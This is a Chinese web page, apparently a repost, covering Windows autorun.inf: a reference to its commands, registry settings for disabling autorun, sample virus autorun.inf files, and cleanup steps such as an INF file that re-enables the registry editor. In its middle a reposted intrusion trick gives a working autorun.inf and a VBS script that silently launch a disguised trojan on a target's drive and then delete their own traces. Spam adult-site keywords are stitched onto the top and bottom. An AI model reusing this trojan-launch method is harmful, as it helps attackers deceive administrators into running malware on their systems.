亚洲av大全在线免费观看_ Autorun.inf完全操作手冊

Autorun.inf完全操作手冊

夜火：總結的比較全，有用的幾乎都寫(xiě)上了，對比以前收集的《病毒的Autorun.inf新寫(xiě)法與應用以及防御》和《徹底杜絕Autorun.inf自動(dòng)運行》對自己寫(xiě)寫(xiě)Autorun.inf，或修改，查殺病毒等頗有幫助

筆者按：鑒于現在網(wǎng)上完全介紹Autorun.inf功能的文章不多，筆者在微軟官網(wǎng)的一個(gè)犄角旮旯找到了一篇Autorun.inf的英文使用說(shuō)明，在翻譯和筆者的親自試驗下寫(xiě)出此篇文章。

======我是分隔線(xiàn)======

一、autorun.inf是windows下操縱光盤(pán)行為的一個(gè)文件，需要放在光盤(pán)根目錄下，部分操作對于硬盤(pán)也適用。

二、autorun.inf是可以被禁止的。方法如下：

點(diǎn)擊開(kāi)始->運行，在文本框中輸入regedit或者regedt32。依次展開(kāi)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer，其中的NoDriveTypeAutoRun子鍵限制著(zhù)Autorun的作用范圍，默認為95（16進(jìn)制）。

把禁用的設備標志相加設置為鍵值就可以完成設置，其中設備標志如下：
1:無(wú)法識別的設備(建議禁止，默認禁止)
2:沒(méi)有根目錄的設備(Drive without root directory未知含義，建議禁止，默認不禁止)
4:可移動(dòng)的設備(U盤(pán)，建議禁止，很多病毒利用U盤(pán)的Autorun.inf進(jìn)行傳染，默認禁止)
8:固定的設備(硬盤(pán)，自己看著(zhù)辦，默認不禁止)
16:網(wǎng)絡(luò )設備(web驅動(dòng)器，建議禁止，默認禁止)
32:光盤(pán)驅動(dòng)設備(CDROM，默認不禁止)
64:虛擬存儲設備(RAM，建議禁止，默認不禁止)
128:未指定的其他驅動(dòng)器(保留位，建議禁止，默認禁止)

三、autorun.inf文件分為三大部分[AutoRun] [AutoRun.Alpha] [DeviceInstall]。

[AutoRun]適用于Windows95以上系統與32位以上CD-ROM，必選。
[AutoRun.alpha]適用于基于RISC的計算機光驅?zhuān)m用系統為Windows NT 4.0，可選。
[DeviceInstall]適用于Windows XP以上系統，可選。

四、[AutoRun]部分的命令及其詳解。

1、DefaultIcon
含義：
指定應用程序的默認圖標。
格式：
DefalutIcon=圖標路徑名[,序號]
參數：
圖標文件名：應用程序的默認圖標路徑名，格式可以為.ico、.bmp、.exe、.dll。當文件格式為.exe和.dll時(shí)，有時(shí)需要使用序號來(lái)指定圖標。
序號：當文件格式為.exe和.dll時(shí)，文件可能包括多余一個(gè)圖標，此時(shí)需要使用序號來(lái)指定圖標，需要注意的是，序號是從0開(kāi)始的。
備注：
應用程序的默認圖標將在windows explorer核心的驅動(dòng)顯示窗口中替代設備的默認圖標來(lái)顯示。
圖標路徑名的默認目錄是設備根目錄。

2、Icon
含義：
指定設備顯示圖標。
格式：
Icon=圖標路徑名[,序號]
參數：
圖標文件名：應用程序的默認圖標路徑名，格式可以為.ico、.bmp、.exe、.dll。當文件格式為.exe和.dll時(shí)，有時(shí)需要使用序號來(lái)指定圖標。
序號：當文件格式為.exe和.dll時(shí)，文件可能包括多余一個(gè)圖標，此時(shí)需要使用序號來(lái)指定圖標，需要注意的是，序號是從0開(kāi)始的。
備注：
設備顯示圖標將在windows explorer核心的驅動(dòng)顯示窗口中替代設備的默認圖標來(lái)顯示。
圖標路徑名的默認目錄是設備根目錄。
當存在應用程序默認圖標(DefaultIcon)時(shí)，本命令無(wú)效。

3、Label
含義：
指定設備描述
格式：
Label=描述
參數：
描述：任意文字，可以包括空格。
備注：
設備描述將在windows explorer核心的驅動(dòng)顯示窗口中替代設備的默認描述\卷標來(lái)顯示。
在非windows explorer核心的驅動(dòng)顯示窗口中（例如右擊設備選擇屬性）顯示的仍然是設備的卷標。

4、Open
含義：
指定設備啟用時(shí)運行之命令行。
格式：
Open=命令行
(命令行：程序路徑名 [參數])
參數：
命令行：自動(dòng)運行的命令行，必須是.exe、.com、.bat文件，其他格式文件可以使用start.exe打開(kāi)或使用ShellExecute命令。
備注：
命令行的起始目錄是設備根目錄和系統的＄Path環(huán)境變量。

5、ShellExecute
含義：
指定設備啟用時(shí)執行文件。（操作系統支持未知）
格式：
ShellExecute=執行文件路徑名 [參數]
參數：
執行文件路徑名：設備啟用時(shí)執行文件路徑名?？梢允侨我飧袷轿募?。系統會(huì )調用設置的程序執行此文件。
參數：參數，根據執行文件作調整
備注：
命令行的起始目錄是設備根目錄和系統的＄Path環(huán)境變量。

6、Shell\關(guān)鍵字\Command
含義：
定義設備右鍵菜單執行命令行。
格式：
Shell\關(guān)鍵字\Command=命令行
(命令行：程序路徑名 [參數])
參數：
命令行：自動(dòng)運行的命令行，必須是.exe、.com、.bat文件，其他格式文件可以使用start.exe打開(kāi)。
備注：
命令行的起始目錄是設備根目錄和系統的＄Path環(huán)境變量。

7、Shell\關(guān)鍵字
含義：
定義設備右鍵菜單文本。
格式：
Shell\關(guān)鍵字=文本
參數：
關(guān)鍵字：用以標記菜單，可以使用任何字符表示，包括空格。
文本：在右鍵菜單中顯示的文本?？梢允褂萌魏巫址?，不能存在空格。
備注：
在同一Autorun.inf文件中，不同右鍵菜單關(guān)鍵字不同，相同右鍵菜單關(guān)鍵字相同。
右鍵菜單文本中可以使用&設定加速鍵，&&輸出一個(gè)&。
Shell\關(guān)鍵字\Command命令Shell\關(guān)鍵字兩者缺一不可，順序無(wú)所謂。
當不存在Open、ShellExecute與Shell命令時(shí)，設備啟用時(shí)運行第一個(gè)設備右鍵菜單指定命令。

8、Shell
含義：
定義設備啟用時(shí)運行之設備右鍵命令。
格式：
Shell=關(guān)鍵字
參數：
關(guān)鍵字：標記過(guò)的菜單關(guān)鍵字
備注：
Shell指定的關(guān)鍵字可以在A(yíng)utoRun.inf文件的任意部分。
Open\ShellExecute\Shell命令后定義的優(yōu)先級高。

四、[AutoRun.alpha]部分的命令簡(jiǎn)介。

[AutoRun.alpha]部分的命令與[AutoRun]部分的命令相同，只不過(guò)在基于RISC的計算機光驅中，[AutoRun.alpha]優(yōu)先級高于[AutoRun]

五、[DeviceInstall]部分命令及其詳解。

DriverPath
含義：
定義搜索驅動(dòng)程序目錄。
格式：
DriverPath=驅動(dòng)程序路徑
參數：
驅動(dòng)程序路徑：驅動(dòng)程序所在路徑，包括其子路徑。
備注：
Windows XP以上支持。
僅CD-ROM支持
當系統監測到一個(gè)新的設備時(shí)，會(huì )提示用戶(hù)尋找設備的驅動(dòng)程序。當用戶(hù)點(diǎn)選此CD-ROM時(shí)，當[DeviceInstall]部分存在時(shí)，系統會(huì )按照 DriverPath所標記的路徑出尋找驅動(dòng)程序。未標記的路徑系統將忽略查找。當[DeviceInstall]部分不存在時(shí)，系統將進(jìn)行完全查找。
如果不希望系統在此CD-ROM中搜索驅動(dòng)程序，只加一行[DeviceInstall]不加DriverPath命令即可。

在zj1244小葵&職業(yè)欠錢(qián)的blog上看到的，感覺(jué)不錯，轉之~

首先是autorun.inf
一般的病毒的Autorun.inf文件內容為
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe

shellexecute=.\RECYCLER\RECYCLER\autorun.exe
它的效果是當雙擊打開(kāi)盤(pán)時(shí).會(huì )運行RECYCLER\RECYCLER\autorun.exe文件,用右鍵打開(kāi),會(huì )顯示Open,Browser.
還有一種是
[autorun]
OPEN=SVCH0ST.EXE
shell\open=打開(kāi)(&O)
shell\open\Command=SVCH0ST.EXE
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=SVCH0ST.EXE
對于這種U盤(pán)病毒，無(wú)論右鍵選擇“打開(kāi)”還是“資源管理器”病毒都會(huì )運行。
一種利用autorun.inf提權的方法（轉）
以前看過(guò)很多關(guān)于A(yíng)utoRun.inf的利用文章,網(wǎng)上全是千篇一律,互相模仿.我再來(lái)添點(diǎn)東西吧~

還是先簡(jiǎn)單說(shuō)下原理吧.寫(xiě)一個(gè)AutoRun.inf文件,放在對方某一盤(pán)符下,當管理員雙擊此盤(pán)時(shí),就會(huì )執行AutoRun.inf指定的文件了.一般用在入侵時(shí)沒(méi)有運行權限時(shí),欺騙管理員幫你運行..

以前我在網(wǎng)上看到的都是一個(gè)模式

[AutoRun]

open = 你想運行的程序

先不說(shuō)這樣運行是不是成功的,稍微想一下,就知道有問(wèn)題,人家管理員不是傻子,這樣雙擊是打不開(kāi)盤(pán)符的,人家肯定知道出問(wèn)題了,所以你玩不長(cháng)的..

事實(shí)上那個(gè)文件在我機子是運行不起的,網(wǎng)上也沒(méi)找到解決辦法,相信還有很多人和我遇到過(guò)同樣的問(wèn)題,求人不如求已,自己搞定吧.

也不難,只要這樣寫(xiě)就OK了:

[AutoRun]
open=AutoRun.exe
shellexecute=AutoRun.exe
shell\Auto\command=AutoRun.exe

這樣,你把它保存為一個(gè).inf文件,放在C盤(pán)下,AutoRun.exe為你指定的運行程序.這樣雙擊C盤(pán)就可以成功運行了.前面還說(shuō)過(guò)一個(gè)問(wèn)題,就是C盤(pán)打不開(kāi),很容易就被管理員發(fā)現了,有待改進(jìn).下來(lái)就說(shuō)怎么解決這個(gè)問(wèn)題,GO ON!

其實(shí)這個(gè)實(shí)現起來(lái)也不難,先把AutoRun.inf上傳至對方C盤(pán),我們可以做一個(gè)自解壓包,也放在C盤(pán)根目錄下,讓他成為我們的指定運行文件,里面包含我們要運行的程序,比如木馬,還一個(gè)VBS腳本,自解壓包執行后先讓他執行VBS腳本,內容如下:

set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start WINLOG0N.exe",0
yu.run "cmd /c del AutoRun.inf",0
yu.run "cmd /c start c:\",0
yu.run "cmd /c del AutoRun.vbs",0

我再簡(jiǎn)單解釋下,解壓后VBS幫我們運行winlogon.exe(我配置好的木馬),然后刪掉AutoRun.inf,為什么要刪掉它,第一,減少被發(fā) 現的機會(huì ),二,刪掉它,管理員重啟機子或注銷(xiāo)后如果右鍵點(diǎn)擊盤(pán)復符不會(huì )出現"播放",一切恢復中馬前的狀態(tài),當然之前我們的木馬已經(jīng)運行了.第四行代碼: 我們?yōu)樗蜷_(kāi)C盤(pán),最后再刪掉vbs腳本自身.

這樣改進(jìn)后個(gè)人覺(jué)得安全性大大提高了.呵呵..各位在測試的時(shí)候只須把上面腳本中的 WINLOG0N.exe改為自己的木馬就可以了.winxp sp2下測試成功。
防治方法
其實(shí)這個(gè)文件不是病毒。也是用來(lái)打開(kāi)病毒了。防治它的思路有兩種：一是禁用自動(dòng)播放，二是刪除它，三是阻止它生成。
1。在Windows系統有允許和阻止自動(dòng)運行的鍵值的方法：

　　在注冊表中找到如下鍵：

鍵路徑：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]

在右側窗格中有 "NoDriveTypeAutoRun"這個(gè)鍵決定了是否執行Autorun功能.其中每一位代表一個(gè)設備,不同設備用以下數值表示:

設備名稱(chēng) 第幾位值設備用如下數值表示設備名稱(chēng)含義
DRIVE_UNKNOWN 0 1 01h 不能識別的類(lèi)型設備
DRIVE_NO_ROOT_DIR 1 0 02h 沒(méi)有根目錄的驅動(dòng)器
DRIVE_REMOVABLE 2 1 04h 可移動(dòng)驅動(dòng)器
DRIVE_FIXED 3 0 08h 固定的驅動(dòng)器
DRIVE_REMOTE 4 1 10h 網(wǎng)絡(luò )驅動(dòng)器
DRIVE_CDROM 5 0 20h 光驅
DRIVE_RAMDISK 6 0 40h RAM磁盤(pán)

其中：保留 7 1 80h 　未指定的驅動(dòng)器類(lèi)型

以上值"0"表示設備運行，"1"表示設備不運行。
從上面可以看出，對應的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自動(dòng)運行的。所以要禁止硬盤(pán)自動(dòng)運行AutoRun.inf文件，就必須將DRIVE_FIXED這些鍵的值設為1，由于DRIVE_FIXED代表固定的驅動(dòng) 器(即硬盤(pán))。如果僅想禁止軟件光盤(pán)的AutoRun功能，但又保留對CD音頻碟的自動(dòng)播放能力，這時(shí)只需將“NoDriveTypeAutoRun”的鍵值改為：BD,00,00,00即可。
還有就是通過(guò)組策略關(guān)閉自動(dòng)播放，但是在有些版本window xp 中不存在哪個(gè)策略。
2。為了防止autorun.inf的生成，我們可以在u盤(pán)根目錄下創(chuàng )建一個(gè)名字是autorun.inf的文件夾。
3。我們可以選擇在dos下刪除文件，但是在通常情況下autorun.inf有系統，隱藏，只讀屬性。所以應該先去掉這些屬性之后再刪除文件。具體方法如下：
開(kāi)始---運行---cmd（打開(kāi)命令提示符）
D: dir /a a* （沒(méi)有參數A是看不到的，A是顯示所有的意思）
此時(shí)你會(huì )發(fā)現一個(gè)autorun.inf文件，
attrib autorun.inf -s -h -r 去掉autorun.inf文件的系統、只讀、隱藏屬性。然后就可以刪除了
del AutoRun.inf
二.常見(jiàn)的病毒
通過(guò)autorun文件可以打開(kāi)任何文件，所以很難講什么是常見(jiàn)的。我所覺(jué)得有趣的是，運行病毒之后，病毒的自我保護方法。比如說(shuō)存在保護程序，禁用注冊表，禁用顯示隱藏文件選項或文件夾選項。隱藏進(jìn)程等等。
1。注冊表的禁用與解用。

最好的方法是下載個(gè)注冊表修復工具
你先到這里看看瑞星的注冊表修復工具http://it.rising.com.cn/service/technology/RegClean_download.htm
如果仍然不能解決請按1樓的方法試試
假如"運行"被禁止掉那么請用下面介紹的方法

注冊表編輯器已被禁用，我們用INF文件來(lái)解除。那么我們可以在記事本里寫(xiě)入下面的內容：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁注冊表編輯器
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0

然后把文件另存為一個(gè)INF文件，右擊文件----點(diǎn)“安裝”就可以啦^O^
我們可以看到第一個(gè)語(yǔ)段，在Signature后面的簽名"$Windows NT$"它是指明我的操作系統是NT的，如果你的操作系統是98的在后面的簽名中應該寫(xiě)"$CHICAGO$"。
再看第二個(gè)語(yǔ)段，等號左邊的“ADDREG”是不能更改的，等號右邊的內容就隨你的心情啦，但是有一點(diǎn)要注意，就是要與在第三個(gè)語(yǔ)段中使用的語(yǔ)句保持一致。另外還有一項操作是“DELREG”(刪除鍵)和“ADDREG”的用法一樣，后面介紹。
好了，這回各位看觀(guān)是不是想要躍躍欲試了呢，不要著(zhù)急，好像還有一點(diǎn)和REG文件不一樣噢，呵呵我看出來(lái)了，就是在文件的最后，怎么有“，”(注：逗號)。還有“HKCU”這些都是什么呀？
這就是與REG文件不一樣的格式啦。
“HKCU”指的是注冊表中的根鍵，其中“HKCU”是“HKEY_CURRENT_USER”的縮寫(xiě)，其它的還有“HKCR”--- “HKEY_CLASSES_ROOT”、“HKLM”----“HKEY_LOCAL_MACHINE”、“HKU”---- “HKEY_USERS”、“HKCC”----“HKEY_CURRENT_CONFIG”、“HKDD”----“HKEY_DYN_DATA”。如果你想要對哪個(gè)根鍵操作那么就可以按照上面的縮寫(xiě)對號入座了。
“，”(注：逗號)，它是根鍵與子鍵、子鍵與鍵名、鍵名與鍵類(lèi)型、鍵類(lèi)型與鍵值的分割符。
在具體修改注冊表鍵值語(yǔ)段的格式為：根鍵，子鍵，鍵名，鍵類(lèi)型，鍵值(注：中間的逗號不能省略)。
上面這個(gè)文件中我們知道其實(shí)要修改的是DisableRegistryTools鍵，把它的值改為“0”。它的類(lèi)型為DWORD(雙字節)，在INF文件有關(guān)注冊表的操作中有字符串類(lèi)型(用“0”表示)和二進(jìn)制類(lèi)型(用“1”表示)，在網(wǎng)上沒(méi)有找到INF文件表示雙字節類(lèi)型的資料，望知道的人補充。在這里我們直接用二進(jìn)制類(lèi)型就可以了，所以大家看到在鍵類(lèi)型的位置上是個(gè)“1”，最后是要修改的鍵值“0”。
前面提到“DELREG”它是刪除鍵值的操作，如果要想把DisableRegistryTools鍵刪除的話(huà)可以這樣寫(xiě)：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
DELREG=Mydel

[Mydel]
;刪除DisableRegistryTools鍵
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

就是省略掉鍵類(lèi)型和鍵值字段，最后把這個(gè)文件另存為一個(gè)INF文件，右擊文件----點(diǎn)“安裝”就可以了。
好了，不知道各位看觀(guān)是不是看明白了，沒(méi)看明白也沒(méi)關(guān)系，我寫(xiě)了一個(gè)，大家只要把下面的內容復制到記事本中，然后把這個(gè)文件另存為一個(gè)INF文件，最后右擊文件----點(diǎn)“安裝”就可以了。(注：這個(gè)文件可以解決前文中所提到問(wèn)題，只能在NT系統中使用，主頁(yè)會(huì )被改成20CN的首頁(yè)，嘻嘻做個(gè)廣告啦 ^O^)。

-----------------------------------------------------------------------------------
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁注冊表編輯器
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0
2。顯示出被隱藏的系統文件

運行——regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL，將CheckedValue鍵值修改為1

這里要注意，病毒會(huì )把本來(lái)有效的DWORD值CheckedValue刪除掉，新建了一個(gè)無(wú)效的字符串值CheckedValue，并且把鍵值改為0！我們將這個(gè)改為1是毫無(wú)作用的。（有部分病毒變種會(huì )直接把這個(gè)CheckedValue給刪掉，只需和下面一樣，自己再重新建一個(gè)就可以了）

方法：刪除此CheckedValue鍵值，單擊右鍵新建——Dword值——命名為CheckedValue，然后修改它的鍵值為1，這樣就可以選擇“顯示所有隱藏文件”和“顯示系統文件”。

在文件夾——工具——文件夾選項中將系統文件和隱藏文件設置為顯示。

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

Autorun.inf完全操作手冊

病毒的Autorun.inf新寫(xiě)法與應用以及防御